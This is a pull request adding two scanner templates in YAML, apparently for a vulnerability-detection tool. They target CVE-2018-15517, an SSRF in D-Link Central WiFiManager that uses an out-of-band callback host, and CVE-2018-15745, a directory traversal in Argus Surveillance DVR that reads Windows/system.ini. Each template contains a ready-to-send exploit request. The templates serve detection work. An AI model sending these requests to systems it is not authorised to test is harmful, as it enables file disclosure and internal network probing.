### PR TITLE
Create CVE-2018-15745.yaml, CVE-2018-15517.yaml

### DIFF
--- a/cves/2018/CVE-2018-15517.yaml
+++ b/cves/2018/CVE-2018-15517.yaml
@@ -1,0 +1,21 @@
+id: CVE-2018-15517
+
+info:
+  name: D-LINK Central WifiManager - SSRF
+  description: Using a web browser or script SSRF can be initiated against internal/external systems to conduct port scans by leveraging D LINKs MailConnect component. The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 devices is intended to check a connection to an SMTP server but actually allows outbound TCP to any port on any IP address, leading to SSRF, as demonstrated by an index.php/System/MailConnect/host/127.0.0.1/port/22/secure/ URI. This can undermine accountability of where scan or connections actually came from and or bypass the FW etc. This can be automated via script or using Web Browser.
+  reference:
+    - http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-SERVER-SIDE-REQUEST-FORGERY.txt
+  author: gy741
+  severity: medium
+  tags: cve,cve2018,d-link,ssrf,oob
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php/System/MailConnect/host/{{interactsh-url}}/port/80/secure/"
+
+    matchers:
+      - type: word
+        part: interactsh_protocol # Confirms the HTTP Interaction
+        words:
+          - "http"

--- a/cves/2018/CVE-2018-15517.yaml
+++ b/cves/2018/CVE-2018-15517.yaml
@@ -7,7 +7,7 @@ info:
     - http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-SERVER-SIDE-REQUEST-FORGERY.txt
   author: gy741
   severity: medium
-  tags: cve,cve2018,d-link,ssrf,oob
+  tags: cve,cve2018,dlink,ssrf,oob
 
 requests:
   - method: GET

--- a/cves/2018/CVE-2018-15745.yaml
+++ b/cves/2018/CVE-2018-15745.yaml
@@ -23,3 +23,5 @@ requests:
         part: body
         words:
           - "for 16-bit app support"
+          - "[drivers]"
+        condition: and

--- a/cves/2018/CVE-2018-15745.yaml
+++ b/cves/2018/CVE-2018-15745.yaml
@@ -1,0 +1,25 @@
+id: CVE-2018-15745
+
+info:
+  name: Argus Surveillance DVR - Directory Traversal
+  author: gy741
+  severity: high
+  description: Argus Surveillance DVR 4.0.0.0 devices allow Unauthenticated Directory Traversal, leading to File Disclosure via a ..%2F in the WEBACCOUNT.CGI RESULTPAGE parameter.
+  reference: http://hyp3rlinx.altervista.org/advisories/ARGUS-SURVEILLANCE-DVR-v4-UNAUTHENTICATED-PATH-TRAVERSAL-FILE-DISCLOSURE.txt
+  tags: cve,cve2018,argussurveillance,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD="
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: body
+        words:
+          - "for 16-bit app support"


### PR DESCRIPTION
### Template / PR Information

Hello,

Added CVE-2018-15745, CVE-2018-15517

CVE-2018-15517:
```
Using a web browser or script SSRF can be initiated against internal/external systems to conduct port scans by leveraging D LINKs MailConnect component. The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 devices is intended to check a connection to an SMTP server but actually allows outbound TCP to any port on any IP address, leading to SSRF, as demonstrated by an index.php/System/MailConnect/host/127.0.0.1/port/22/secure/ URI. This can undermine accountability of where scan or connections actually came from and or bypass the FW etc. This can be automated via script or using Web Browser.
```

CVE-2018-15745:
```
Argus Surveillance DVR 4.0.0.0 devices allow Unauthenticated Directory Traversal, leading to File Disclosure via a ..%2F in the WEBACCOUNT.CGI RESULTPAGE parameter.
```

Thanks

### Template Validation

I've validated this template locally?
- [ ] YES
- [v] NO
